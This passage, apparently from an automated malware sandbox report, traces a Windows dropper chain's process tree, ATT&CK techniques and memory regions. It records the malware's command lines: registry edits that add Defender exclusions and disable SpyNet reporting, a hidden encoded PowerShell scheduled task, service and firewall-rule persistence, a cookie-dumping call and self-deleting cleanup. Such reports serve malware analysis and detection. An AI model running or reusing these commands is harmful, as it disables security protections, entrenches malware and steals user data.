                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 968
                - Program crash
            [7] C:\Windows\SysWOW64\rundll32.exe
                cmdline: "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                - Blocklisted process makes network request
                - Drops file in Program Files directory
                - Checks processor information in registry
                - Modifies registry class
                - Modifies system certificate store
                - Suspicious use of FindShellTrayWindow
          [6] C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe
              cmdline: "C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe
                cmdline: "C:\Users\Admin\Documents\aP3Zf8LTtQ0RxlWoO0vNq15I.exe"
                - Executes dropped EXE
              [8] C:\Windows\SysWOW64\WerFault.exe
                  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 536
                  - Executes dropped EXE
                  - Checks BIOS information in registry
                  - Suspicious use of SetThreadContext
                  - Program crash
          [6] C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe
              cmdline: "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Loads dropped DLL
              - Checks processor information in registry
            [7] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe" & del C:\ProgramData\*.dll & exit
              [8] C:\Windows\SysWOW64\taskkill.exe
                  cmdline: taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f
                  - Kills process with taskkill
              [8] C:\Windows\SysWOW64\timeout.exe
                  cmdline: timeout /t 6
                  - Delays execution with timeout.exe
          [6] C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe
              cmdline: "C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"
              - Executes dropped EXE
              - Checks computer location settings
            [7] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmdline: cmd
                [9] C:\Windows\SysWOW64\tasklist.exe
                    cmdline: tasklist /FI "imagename eq BullGuardCore.exe"
                    - Enumerates processes with tasklist
                [9] C:\Windows\SysWOW64\find.exe
                    cmdline: find /I /N "bullguardcore.exe"
                [9] C:\Windows\SysWOW64\tasklist.exe
                    cmdline: tasklist /FI "imagename eq PSUAService.exe"
                    - Enumerates processes with tasklist
                [9] C:\Windows\SysWOW64\find.exe
                    cmdline: find /I /N "psuaservice.exe"
                [9] C:\Windows\SysWOW64\findstr.exe
                    cmdline: findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                [9] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                    cmdline: Accostarmi.exe.pif N
                    - Executes dropped EXE
                    - Suspicious use of FindShellTrayWindow
                    - Suspicious use of SendNotifyMessage
          [6] C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe
              cmdline: "C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Adds Run key to start application
            [7] C:\Users\Admin\AppData\Local\Temp\dada.exe
                cmdline: "C:\Users\Admin\AppData\Local\Temp\dada.exe"
                - Executes dropped EXE
                - Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\build.exe
                cmdline: "C:\Users\Admin\AppData\Local\Temp\build.exe"
                - Executes dropped EXE
                - Checks computer location settings
              [8] C:\Windows\SysWOW64\schtasks.exe
                  cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                  - Creates scheduled task(s)
          [6] C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe
              cmdline: "C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
          [6] C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe
              cmdline: "C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe
              cmdline: "C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"
              - Executes dropped EXE
            [7] C:\Users\Admin\AppData\Local\Temp\7zS5D5.tmp\Install.exe
                cmdline: .\Install.exe
                - Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\7zS1E9C.tmp\Install.exe
                  cmdline: .\Install.exe /S /site_id "525403"
                  - Executes dropped EXE
                  - Checks BIOS information in registry
                  - Checks computer location settings
                  - Drops file in System32 directory
                  - Enumerates system info in registry
                [9] C:\Windows\SysWOW64\forfiles.exe
                    cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  [10] C:\Windows\SysWOW64\cmd.exe
                      cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    [11] \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        - Executes dropped EXE
                    [11] \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                [9] C:\Windows\SysWOW64\forfiles.exe
                    cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                  [10] C:\Windows\SysWOW64\cmd.exe
                      cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    [11] \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    [11] \??\c:\windows\SysWOW64\reg.exe
                        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                [9] C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /CREATE /TN "gscIZCLGx" /SC once /ST 01:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    - Creates scheduled task(s)
                [9] C:\Windows\SysWOW64\schtasks.exe
                    cmdline: schtasks /run /I /tn "gscIZCLGx"
          [6] C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe
              cmdline: "C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 900
                - Program crash
          [6] C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe
              cmdline: "C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 444
                - Program crash
          [6] C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe
              cmdline: "C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"
            [7] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rgrsamop\
            [7] C:\Windows\SysWOW64\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iaghphix.exe" C:\Windows\SysWOW64\rgrsamop\
            [7] C:\Windows\SysWOW64\sc.exe
                cmdline: "C:\Windows\System32\sc.exe" description rgrsamop "wifi internet conection"
            [7] C:\Windows\SysWOW64\sc.exe
                cmdline: "C:\Windows\System32\sc.exe" start rgrsamop
            [7] C:\Windows\SysWOW64\sc.exe
                cmdline: "C:\Windows\System32\sc.exe" create rgrsamop binPath= "C:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d\"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe\"" type= own start= auto DisplayName= "wifi support"
            [7] C:\Windows\SysWOW64\netsh.exe
                cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 1256
                - Program crash
          [6] C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe
              cmdline: "C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe
              cmdline: "C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 428
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 4407⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_5.exesahiba_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_4.exesahiba_4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_3.exesahiba_3.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 10646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_2.exesahiba_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sahiba_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exesahiba_1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe" -a6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_7.exesahiba_7.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2208 -ip 22081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1504 -ip 15041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 1344 -ip 13441⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 1344 -ip 13441⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5628 -ip 56281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5788 -ip 57881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5352 -ip 53521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2132 -ip 21321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5352 -ip 53521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5788 -ip 57881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5424 -ip 54241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5628 -ip 56281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5372 -ip 53721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\rgrsamop\iaghphix.exeC:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 5602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7016 -ip 70161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 464 -ip 4641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 464 -ip 4641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5424 -ip 54241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5424 -ip 54241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5424 -ip 54241⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Modify Existing Service: 2
- New Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
Defense Evasion
- Modify Registry: 4
- Disabling Security Tools: 1
- Virtualization/Sandbox Evasion: 1
- Install Root Certificate: 1
Downloads
472KB
-
memory/3464-209-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/3464-206-0x0000000000070000-0x00000000000FA000-memory.dmpFilesize
552KB
-
memory/3464-215-0x00000000049C0000-0x00000000049C1000-memory.dmpFilesize
4KB
-
memory/3464-220-0x00000000048B0000-0x00000000048CE000-memory.dmpFilesize
120KB
-
memory/3476-256-0x00007FF839570000-0x00007FF839571000-memory.dmpFilesize
4KB
-
memory/3584-233-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/3584-246-0x0000000003540000-0x0000000003542000-memory.dmpFilesize
8KB
-
memory/4748-182-0x0000000000770000-0x0000000000842000-memory.dmpFilesize
840KB
-
memory/4748-191-0x0000000073C10000-0x00000000743C0000-memory.dmpFilesize
7.7MB
-
memory/4756-178-0x00000000006A0000-0x00000000006A8000-memory.dmpFilesize
32KB
-
memory/4756-189-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/4756-190-0x000000001C030000-0x000000001C032000-memory.dmpFilesize
8KB
-
memory/4792-210-0x00000000009B2000-0x00000000009BB000-memory.dmpFilesize
36KB
-
memory/4792-177-0x00000000009B2000-0x00000000009BB000-memory.dmpFilesize
36KB
-
memory/4792-217-0x0000000000400000-0x0000000000891000-memory.dmpFilesize
4.6MB
-
memory/4792-211-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/4816-372-0x0000000010000000-0x0000000010D56000-memory.dmpFilesize
13.3MB
-
memory/5320-301-0x00000000005CD000-0x00000000005F4000-memory.dmpFilesize
156KB
-
memory/5332-273-0x00000000000E0000-0x0000000000106000-memory.dmpFilesize
152KB
-
memory/5332-285-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/5344-286-0x0000000005200000-0x00000000057A4000-memory.dmpFilesize
5.6MB
-
memory/5344-276-0x0000000004AD0000-0x0000000004B46000-memory.dmpFilesize
472KB
-
memory/5344-272-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5344-271-0x0000000000330000-0x0000000000382000-memory.dmpFilesize
328KB
-
memory/5372-280-0x00000000007F8000-0x0000000000848000-memory.dmpFilesize
320KB
-
memory/5416-274-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/5416-275-0x0000000000110000-0x0000000000140000-memory.dmpFilesize
192KB
-
memory/5424-365-0x0000000000400000-0x000000000063D000-memory.dmpFilesize
2.2MB
-
memory/5472-283-0x0000000077480000-0x0000000077695000-memory.dmpFilesize
2.1MB
-
memory/5472-296-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/5472-290-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-292-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5472-279-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/5472-287-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-281-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-298-0x00000000776E0000-0x0000000077C93000-memory.dmpFilesize
5.7MB
-
memory/5472-278-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-291-0x0000000074F50000-0x0000000074FD9000-memory.dmpFilesize
548KB
-
memory/5472-310-0x00000000711A0000-0x00000000711EC000-memory.dmpFilesize
304KB
-
memory/5472-295-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/5480-293-0x0000000002440000-0x00000000024A0000-memory.dmpFilesize
384KB
-
memory/5480-299-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/5596-282-0x0000000000658000-0x00000000006C4000-memory.dmpFilesize
432KB
-
memory/5744-288-0x0000000000818000-0x0000000000826000-memory.dmpFilesize
56KB
-
memory/5788-297-0x0000000000860000-0x00000000008C0000-memory.dmpFilesize
384KB
-
memory/5796-289-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5796-294-0x00000000059B0000-0x00000000059B1000-memory.dmpFilesize
4KB
-
memory/5796-284-0x0000000000F30000-0x0000000000F48000-memory.dmpFilesize
96KB
-
memory/5964-305-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/7016-397-0x0000000000705000-0x0000000000712000-memory.dmpFilesize
52KB